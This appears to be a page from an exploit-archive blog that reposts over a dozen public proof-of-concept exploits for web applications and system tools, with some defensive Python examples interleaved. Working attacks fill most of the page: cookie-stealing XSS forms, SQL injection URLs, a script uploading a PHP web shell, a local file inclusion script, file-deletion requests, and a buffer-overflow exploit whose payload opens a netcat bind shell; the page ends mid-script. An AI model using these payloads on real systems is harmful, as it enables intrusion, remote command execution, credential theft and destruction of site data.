Contributors to this blog

  • HireHackking 16114

source: https://www.securityfocus.com/bid/47755/info

ecoder is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ecoder 0.4.10 is vulnerable; other versions may also be affected.

http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 
            
source: https://www.securityfocus.com/bid/47758/info

Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Gelsheet 1.02 is vulnerable; other versions may also be affected. 

http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E 
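The two reflected-XSS advisories above become recognisable in web-server access logs once the request target is percent-decoded. The Python below is an added example, not part of any advisory on this page: it parses Combined Log Format lines, decodes the target (repeatedly, so double encoding does not hide a payload) and flags it against small signature sets. It generalises beyond XSS to the SQL-injection and path-traversal request shapes reported further down the page. The log lines, addresses and signature lists are constructed for the demonstration and are not a complete ruleset.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: client ident user [time] "method target protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Illustrative indicators for the three bug classes on this page, applied to the
# fully decoded, lower-cased request target.
PATTERNS = {
    "xss": re.compile(r"<script|javascript:|onerror\s*=|expression\s*\("),
    "sqli": re.compile(r"union\s+(all\s+)?select|'\s*(and|or)\s+'?\d|\bsleep\s*\("),
    "traversal": re.compile(r"(\.\./|\.\.\\){2,}|/etc/passwd|windows[/\\]win\.ini"),
}


def decode_target(target, rounds=3):
    """Percent-decode until stable (bounded) so double-encoded payloads such as
    %252e%252e%252f are inspected in their final form; '+' is read as a space."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target.lower()


def classify_request(target):
    """Return the sorted list of indicator classes that fire on one request target."""
    decoded = decode_target(target)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))


def scan_log(lines):
    """Return (client, path, classes) for every parseable line that trips an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        classes = classify_request(m.group("target"))
        if classes:
            hits.append((m.group("client"), urlsplit(m.group("target")).path, classes))
    return hits


# Constructed sample lines (documentation addresses, not real traffic). The first four
# mimic the request shapes of advisories on this page; the last is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2015:10:00:01 +0000] "GET /ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2015:10:00:02 +0000] "GET /backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29 HTTP/1.1" 200 3021',
    '198.51.100.7 - - [10/Jan/2015:10:00:03 +0000] "GET /setup/filedown.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1844',
    '198.51.100.7 - - [10/Jan/2015:10:00:04 +0000] "GET /index.php?set=%252e%252e%252f%252e%252e%252fwindows%252fwin.ini HTTP/1.1" 200 120',
    '192.0.2.9 - - [10/Jan/2015:10:00:05 +0000] "GET /shop/category:books?page=2 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for client, path, classes in scan_log(SAMPLE_LOG):
        print(client, path, ",".join(classes))
```

Decoding is bounded to three rounds on purpose: an attacker-controlled input that keeps changing under decoding should be flagged as suspicious rather than decoded forever, and a real deployment would add that as its own indicator.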
            
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464

::PROOF OF CONCEPT::

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
            
source: https://www.securityfocus.com/bid/47759/info

phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

phpWebSite 1.7.1 is vulnerable; other versions may also be affected. 

# ------------------------------------------------------------------------
# Software................phpWebSite 1.7.1
# Vulnerability...........Arbitrary Upload
# Threat Level............Very Critical (5/5)
# Download................http://phpwebsite.appstate.edu/
# Discovery Date..........5/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited
# to upload a PHP shell.
# 
# 
# --PoC--

import socket

host = 'localhost'
path = '/phpwebsite_1_7_1'
shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 223\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n'     
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           'AddType application/x-httpd-php .shell\r\n'
           '\r\n'
           'Action application/x-httpd-php "/php/php.exe"\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading .htaccess'
        return
    else: print '.htaccess uploaded'
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 163\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php system($_GET["CMD"]); ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded' 
 

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    
    print 'shell located at http://' + host + shell_path

upload_shell()
            
Sefrengo CMS 1.6.0 - SQL Injection

Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The Content Management System Sefrengo v.1.6.0 contains SQL-Injection vulnerabilities in its administrative Backend.

==================
Technical Details:
==================

The administrative Backend of Sefrengo CMS contains a functionality to edit folders which reside on the CMS. It is located here:

http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0

The parameter "idcat" is vulnerable to SQL-Injection. An attacker could abuse this by sending crafted URLs to the administrator via mail to execute their own SQL commands (e.g. create a second admin account).

Exploit-Example:

http://{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0

Another SQL-Injection vulnerability can be found in the administrative backend, where the admin can manage installed plugins. The vulnerable parameter is "idclient" in the following URL:

http://{TARGET}/backend/main.php?area=plug&idclient=1

Exploit-Example:

http://{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+

=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

21-Dec-2014 - found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 - fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de
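Both Sefrengo findings have the same root cause: a numeric request parameter ("idcat", "idclient") is concatenated into the SQL text, so a quote followed by a UNION changes the statement instead of the comparison value. The Python below is an added example, not Sefrengo's code: it reproduces the concatenation pattern against a constructed in-memory SQLite schema (table and column names are assumptions) and puts two hardened forms beside it, parameter binding and type enforcement. The payload is shaped like the advisory's, with SQLite-valid columns in the UNION.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for two backend tables (assumed names, not Sefrengo's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE categories (idcat INTEGER, name TEXT, owner TEXT, notes TEXT)")
    db.executemany("INSERT INTO categories VALUES (?, ?, ?, ?)",
                   [(1, "Start", "admin", "-"), (2, "News", "editor", "-")])
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'deadbeef')")
    return db


# Same shape as the advisory's idcat payload; the UNION columns are constructed for SQLite.
PAYLOAD = "1' and '1'='2' union select id, login, pw_hash, 4 from users -- "


def load_category_vulnerable(db, idcat):
    """The pattern behind the advisory: the request parameter is spliced into the SQL text."""
    sql = "SELECT idcat, name, owner, notes FROM categories WHERE idcat = '" + idcat + "'"
    return db.execute(sql).fetchall()


def load_category_bound(db, idcat):
    """Hardened form 1: a bound parameter is compared as data, never parsed as SQL."""
    return db.execute(
        "SELECT idcat, name, owner, notes FROM categories WHERE idcat = ?", (idcat,)
    ).fetchall()


def parse_idcat(raw):
    """Hardened form 2: enforce the parameter's type before it reaches the query at all."""
    if not raw.isdigit():
        raise ValueError("idcat must be a non-negative integer")
    return int(raw)


def load_category_safe(db, raw_idcat):
    """Both layers together: validate, then bind."""
    return load_category_bound(db, parse_idcat(raw_idcat))


if __name__ == "__main__":
    db = make_db()
    print(load_category_vulnerable(db, PAYLOAD))  # the users row leaks through the UNION
    print(load_category_bound(db, PAYLOAD))       # []
```

Binding alone already defeats the payload; the integer check on top turns an attempted injection into a logged 400 instead of a silent empty result, which is what an administrator-facing backend should do.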
source: https://www.securityfocus.com/bid/47762/info

TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

TCExam 11.1.029 is vulnerable; other versions may also be affected.

http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL]
source: https://www.securityfocus.com/bid/47766/info

Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.

An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.

Perl versions 5.10.x are vulnerable.

jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a = getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$
Getsimple CMS 3.0 - 'set' Local File Inclusion

source: https://www.securityfocus.com/bid/47767/info

GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

GetSimple 3.0 is vulnerable; other versions may also be affected.

# ------------------------------------------------------------------------
# Software................GetSimple 3.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://get-simple.info/
# Discovery Date..........5/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in GetSimple 3.0 can be exploited
# to include arbitrary files.
#
#
# --PoC--

import socket

host = 'localhost'
path = '/getsimple_3.0'
trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n'
       'Host: localhost\r\n'
       'Proxy-Connection: keep-alive\r\n'
       'User-Agent: x\r\n'
       'Content-Length: 0\r\n'
       'Cache-Control: max-age=0\r\n'
       'Origin: null\r\n'
       'Content-Type: multipart/form-data; boundary=----x\r\n'
       'Accept: text/html\r\n'
       'Accept-Language: en-US,en;q=0.8\r\n'
       'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
       '\r\n')

resp = s.recv(8192)

print resp
<!--
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps

1. Description

Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php

http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):
-->
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>
<!--
File will be visible:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%

3. Solution:

Update to version 3.0.9
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
-->
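The phpWebSite PoC earlier on this page and the wp-easycart advisory above fail at the same point: the upload handler keeps the client-supplied file name. In the phpWebSite case that name is first ".htaccess" (which re-maps a new extension to PHP) and then ".shell"; in the wp-easycart case it is whatever the registered user sends. The Python below is an added example of the server-side checks that close this class, not code from either project: reject dotfiles, allow exactly one extension from an allowlist, require the content's magic bytes to match that extension, and store the file under a server-generated name. The allowlist, magic-byte table and sample uploads are constructed for the demonstration.

```python
import os
import re
import secrets
import tempfile

# Extension allowlist with the leading bytes each type must begin with (constructed subset).
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
# One stem, one dot, one extension: no leading dot, no second extension, no odd characters.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def validate_upload(client_filename, data):
    """Return (True, ext) if the upload may be stored, else (False, reason)."""
    # Only the last path component counts; directories in the client name are ignored.
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name.startswith("."):
        return False, "dotfiles (e.g. .htaccess) are never accepted"
    m = NAME_RE.match(name)
    if not m:
        return False, "name must be <stem>.<ext> using a safe character set"
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        return False, "extension not in allowlist"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the declared type"
    return True, ext


def storage_name(ext):
    """Server-chosen name: the client never controls what the file is called on disk."""
    return secrets.token_hex(16) + "." + ext


def save_upload(upload_dir, client_filename, data):
    """Validate, then write under a generated name. Returns the stored path or None."""
    ok, info = validate_upload(client_filename, data)
    if not ok:
        return None
    path = os.path.join(upload_dir, storage_name(info))
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo():
    """Constructed run: an .htaccess upload is refused, a real PNG is stored under a new name."""
    d = tempfile.mkdtemp()
    rejected = save_upload(d, ".htaccess", b"AddType application/x-httpd-php .shell\n")
    stored = save_upload(d, "banner.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    return rejected is None, stored is not None and stored.endswith(".png")


if __name__ == "__main__":
    print(demo())
```

The name checks only close the door the PoCs walked through; the upload directory should additionally live outside the document root or be served with script execution and .htaccess overrides disabled, so that a validation bug does not become code execution.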
Ntpdc 4.2.6p3 - Local Buffer Overflow

# Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/

from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485                          # junk
sploit += pack("<I", IMAGE_BASE + 0x000143e0)  # eip
sploit += "\x41" * 79                          # junk
sploit += pack("<I", IMAGE_BASE + 0x0002678d)  # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff)                # ESI
ld_pl += pack("<I", 0x11366061)                # EDI
ld_pl += pack("<I", 0x41414141)                # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2)   # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073)   # CALL EDI
ld_pl += pack("<I", 0xbffff60d)                # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):
    for inc in xrange(200):
        ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
        ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)
        environ["LD_PRELOAD"] = ld_pl
        system("echo %s | ntpdc 2>&1" % sploit)
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4

This plugin is fairly old but still used by a lot of people and received its last update nearly 4 years ago. It's vulnerable to arbitrary file deletion and SQL injection.

*Arbitrary File(s) Deletion*

In /microcart/editor/assetmanager/ are a bunch of files which are probably used to manage files/folders for the administrator; unfortunately no authentication or checks were added to verify that the user should have access to it and that the request doesn't contain anything malicious.

The /microcart/editor/assetmanager/folderdel_.php file contains the following on top:

$sMsg = "";
if(isset($_POST["inpCurrFolder"])) {
    $sDestination = pathinfo($_POST["inpCurrFolder"]);
    //DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while($file = readdir($handle))
        if($file != "." && $file != "..")
            unlink($dir . "/" . $file);
    closedir($handle);
    if(rmdir($_POST["inpCurrFolder"])==0)
        $sMsg = "";
    else
        $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}

By simply sending a POST request to this file, we can delete every single file in the specified folder.

POST to: /microcart/editor/assetmanager/folderdel_.php
POST data:
inpCurrFolder: ../../../

This POST request will delete every single .php file in the root folder of vBulletin.

*Arbitrary File Deletion*

There's another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this.

So unlike the previous vulnerability I just wrote about, which deletes all files by sending a POST request with a folder value, this will only delete 1 file off the server.

Vulnerable code:

if(isset($_POST["inpFileToDelete"])) {
    $filename=pathinfo($_POST["inpFileToDelete"]);
    $filename=$filename['basename'];
    if($filename!="")
        unlink($currFolder . "/" . $filename);
    $sMsg = "";
}

Exploited by sending the following request:

POST to: /microcart/editor/assetmanager/assetmanager.php
POST data:
inpCurrFolder: ../../../
inpFileToDelete: index.php

This will delete the /index.php file of vBulletin, in the root.

*Arbitrary Folder Creation*

Besides the file deletion, there's a file called /microcart/editor/assetmanager/foldernew.php which creates a 0755-chmodded folder on the server. The file contains the following on top:

$sMsg = "";
if(isset($_POST["inpNewFolderName"])) {
    $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
    if(is_dir($sFolder)==1) {//folder already exist
        $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
    } else {
        //if(mkdir($sFolder))
        if(mkdir($sFolder,0755))
            $sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
        else
            $sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
    }
}

By sending the following POST request, we will create a folder with 0755 chmodded permission.

POST to: /microcart/editor/assetmanager/foldernew.php
POST data:
inpNewFolderName: davewashere
inpCurrFolder: ../../..

This POST request will create the folder davewashere in the root of the vBulletin forum.

*SQL Injection*

MicroCART is also vulnerable to SQL injection at several locations, although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found at /cart.php lines 833 to 881 and in the function where you can add products to your shopping cart, at around lines 1251 to 1328, where $_POST['fields'] is assigned to the configuration variable which is later used in a query.

*Cross Site Scripting*

When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields. Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.
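The three MicroCART handlers share one defect beyond the missing authentication: inpCurrFolder is joined to a path and used as-is, so "../../../" walks out of the asset directory, and pathinfo()['basename'] on the file name does nothing about the folder component. The Python below is an added example of the path-confinement check those handlers lack; it is not MicroCART's code, and the directory layout it builds is constructed for the demonstration. The same check is the fix for the other traversal findings on this page (GetSimple's set parameter, HOMEPIMA's filedown.php).

```python
import os
import tempfile


def resolve_inside(base_dir, user_folder, user_file=None):
    """Resolve a request to an absolute path, or return None if it leaves base_dir.

    realpath() collapses '..' and follows symlinks on both sides, and commonpath()
    avoids the string-prefix mistake ('/srv/assets' would otherwise accept
    '/srv/assets2/x'). An absolute user_folder is also caught: os.path.join()
    discards base_dir for it, and the containment check then rejects the result.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.join(base, user_folder)
    if user_file is not None:
        # As pathinfo()['basename'] does in the advisory, drop directories from the file name.
        candidate = os.path.join(candidate, os.path.basename(user_file))
    target = os.path.realpath(candidate)
    try:
        if os.path.commonpath([base, target]) != base:
            return None
    except ValueError:  # different drives on Windows
        return None
    if target == base:  # never operate on the asset root itself
        return None
    return target


def delete_asset(base_dir, user_folder, user_file):
    """Hardened replacement for unlink($currFolder . "/" . $filename)."""
    target = resolve_inside(base_dir, user_folder, user_file)
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def delete_folder(base_dir, user_folder):
    """Hardened replacement for folderdel_.php: only empty directories below base_dir."""
    target = resolve_inside(base_dir, user_folder)
    if target is None or not os.path.isdir(target):
        return False
    try:
        os.rmdir(target)  # refuses a non-empty directory instead of unlinking its contents
    except OSError:
        return False
    return True


def demo():
    """Constructed layout: <tmp>/site/index.php must survive; <tmp>/site/assets/uploads/banner.png may go."""
    root = tempfile.mkdtemp()
    assets = os.path.join(root, "site", "assets")
    uploads = os.path.join(assets, "uploads")
    os.makedirs(uploads)
    index = os.path.join(root, "site", "index.php")
    banner = os.path.join(uploads, "banner.png")
    for p in (index, banner):
        with open(p, "w") as fh:
            fh.write("x")
    escaped = delete_asset(assets, "../", "index.php")      # traversal: refused
    legit = delete_asset(assets, "uploads", "banner.png")   # in scope: allowed
    root_wipe = delete_folder(assets, "../../")             # traversal: refused
    emptied = delete_folder(assets, "uploads")              # now empty: allowed
    return escaped, legit, root_wipe, emptied, os.path.exists(index)


if __name__ == "__main__":
    print(demo())  # (False, True, False, True, True)
```

Confinement is the second line of defence; the first is the authorization check the advisory notes is absent, since an asset manager that only administrators may reach should reject the request before looking at any path at all.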
source: https://www.securityfocus.com/bid/47786/info

poMMo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

1.
<form action="http://www.example.com/admin/setup/config/general.php" method="post" name="main">
<input type="hidden" name="list_name" value="Mailing List">
<input type="hidden" name="site_name" value='poMMo"><script>alert(document.cookie)</script>'>
<input type="hidden" name="site_name" value="poMMo Website">
<input type="hidden" name="site_url" value="http://www.example.com/">
<input type="hidden" name="site_success" value="">
<input type="hidden" name="site_confirm" value="">
<input type="hidden" name="list_confirm" value="on">
<input type="hidden" name="list_exchanger" value="mail">
</form>
<script>
document.main.submit();
</script>

2.
http://www.example.com/index.php?referer=1"><script>alert(document.cookie)</script>

3.
<form action="http://www.example.com/admin/subscribers/subscribers_groups.php" method="post" name="main">
<input type="hidden" name="group_name" value='group"><script>alert("XSS")</script>'>
</form>
<script>
document.main.submit();
</script>

4.
<form action="http://www.example.com/admin/setup/setup_fields.php" method="post" name="main">
<input type="hidden" name="field_name" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="field_type" value="text">
</form>
<script>
document.main.submit();
</script>
Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service

source: https://www.securityfocus.com/bid/47820/info

Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.

Apache APR versions prior to 1.4.4 are vulnerable.

<?php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service

author: Maksymilian Arciemowicz
CVE: CVE-2011-0419
CWE: CWE-399

REMOTE

Find some directory with supported mod_autoindex on the server.
The directory should contain long filenames.

http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]

LOCAL

Tested on:

127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built:   Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

Result:

127# ls -la
total 8
drwxrwxrwx  2 root  wheel   512 Feb  8 21:41 .
drwxr-xr-x  7 www   wheel  1024 Jan 31 08:49 ..
-rw-r--r--  1 www   wheel  1056 Feb  8 19:39 .htaccess
-rw-r--r--  1 www   wheel     0 Feb  8 19:39 cx.............................................................................................................................
-rw-r--r--  1 www   wheel  1240 Feb  8 19:42 run.php

127# ps -aux -p 617
USER  PID %CPU %MEM   VSZ  RSS TTY STAT STARTED     TIME COMMAND
www   617 98.6  0.4 10028 4004 ?   R     7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start

Time = 121:43 and counting

where http://[$localhost]:[$localport]/[$localuri]
*/

$localhost="localhost";
